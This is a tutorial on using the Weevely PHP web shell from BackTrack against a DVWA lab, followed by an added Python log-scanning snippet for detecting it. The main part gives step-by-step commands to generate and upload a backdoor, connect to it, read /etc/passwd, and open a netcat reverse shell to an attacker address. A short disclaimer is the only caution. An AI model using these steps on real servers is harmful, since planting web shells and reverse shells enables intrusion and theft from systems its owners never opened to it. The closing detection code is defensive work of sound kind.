Creating Web Backdoor using Backtrack (Weevely tutorial)




Weevely is a stealth PHP web shell and backdoor that provides a telnet-like console to execute system commands and automate administration and post-exploitation tasks. It is an essential tool for web application post-exploitation, and can also be used as a stealth backdoor.

Weevely is available by default in distributions such as BackTrack and BackBox.

Weevely has more than 30 modules available for post-exploitation tasks.

Weevely is written in Python.

Let's start the practical.

Requirement:

1. A web server for uploading the backdoor (I installed DVWA on a Linux box)

2. The Weevely PHP shell (available in BackTrack 5 R3)

Steps to start

1. Weevely is located in /pentest/backdoors/web/weevely/

Open a terminal and type:

cd /pentest/backdoors/web/weevely/

2. Generate the PHP stealth backdoor:

./weevely.py generate security

Running this command creates a new file called weevely.php.

3. After generating the file, the next step is to upload weevely.php to the web server.

I am using DVWA (Damn Vulnerable Web Application) for testing purposes.

4. The file has now been uploaded successfully.

5. Now access weevely.php from the terminal:

./weevely.py 

./weevely.py http://192.168.142.135/dvwa/hackable/uploads/weevely.php security

Now we are on the server.

6. To see the files in that directory, type ls

7. To view the password file, type cat /etc/passwd

8. To see which user we are, type:

whoami



9. Using Weevely for a backdoor

Here I am opening one more terminal and starting netcat:

nc -lvp 1234

And in the Weevely terminal:

:backdoor.reverse_tcp 192.168.142.132 1234



Now we are connected.

Now you can access all server files.
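Seen from the defender's side, steps 3 and 5 leave a clear trace in the web server's access log: a PHP script being requested from a directory that should only hold uploaded files. The following is an added example, not part of the original post or of Weevely; the upload directory list, the script extensions, the combined log format and the sample log lines are assumptions constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import unquote, urlsplit

# Assumption: directories the web application writes user uploads into.
UPLOAD_DIRS = ("/dvwa/hackable/uploads/",)
# Assumption: extensions this server hands to the PHP interpreter.
SCRIPT_EXTS = (".php", ".phtml", ".php5", ".phar")

# Apache/nginx "combined" format: client ip, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

def script_under_uploads(target):
    """Return the normalised script path if the request hits a script in an upload dir."""
    # Drop the query string, decode %xx escapes and fold case before matching.
    path = unquote(urlsplit(target).path).lower()
    for base in UPLOAD_DIRS:
        if not path.startswith(base):
            continue
        prefix = base
        # Walk segment by segment so trailing PATH_INFO (/x.php/extra) is still caught.
        for segment in path[len(base):].split("/"):
            prefix += segment
            if segment.endswith(SCRIPT_EXTS):
                return prefix
            prefix += "/"
    return None

def find_hits(lines):
    """Map (client ip, script path) -> list of (timestamp, method, status)."""
    hits = defaultdict(list)
    for line in lines:
        m = LOG_RE.match(line)
        script = script_under_uploads(m["target"]) if m else None
        if script:
            hits[(m["ip"], script)].append((m["ts"], m["method"], int(m["status"])))
    return dict(hits)

# Constructed sample log lines (not taken from a real server).
SAMPLE = [
    '192.168.142.20 - - [10/Mar/2013:10:00:01 +0000] "GET /dvwa/index.php HTTP/1.1" 200 4821 "-" "Mozilla/5.0"',
    '192.168.142.20 - - [10/Mar/2013:10:00:05 +0000] "GET /dvwa/hackable/uploads/photo.jpg HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
    '192.168.142.132 - - [10/Mar/2013:10:02:10 +0000] "GET /dvwa/hackable/uploads/weevely.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"',
    '192.168.142.132 - - [10/Mar/2013:10:02:15 +0000] "GET /dvwa/hackable/uploads/Weevely%2EPHP/x HTTP/1.1" 200 0 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for (ip, script), events in find_hits(SAMPLE).items():
        print(f"{ip} requested {script} {len(events)} time(s), first at {events[0][0]}")
```

Any hit is worth investigating, since a correctly configured upload directory should never serve executable scripts; disabling script execution for that directory in the web server configuration removes the condition the tutorial relies on.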

NOTE: For study purposes only. Don't try this.

Thank you.
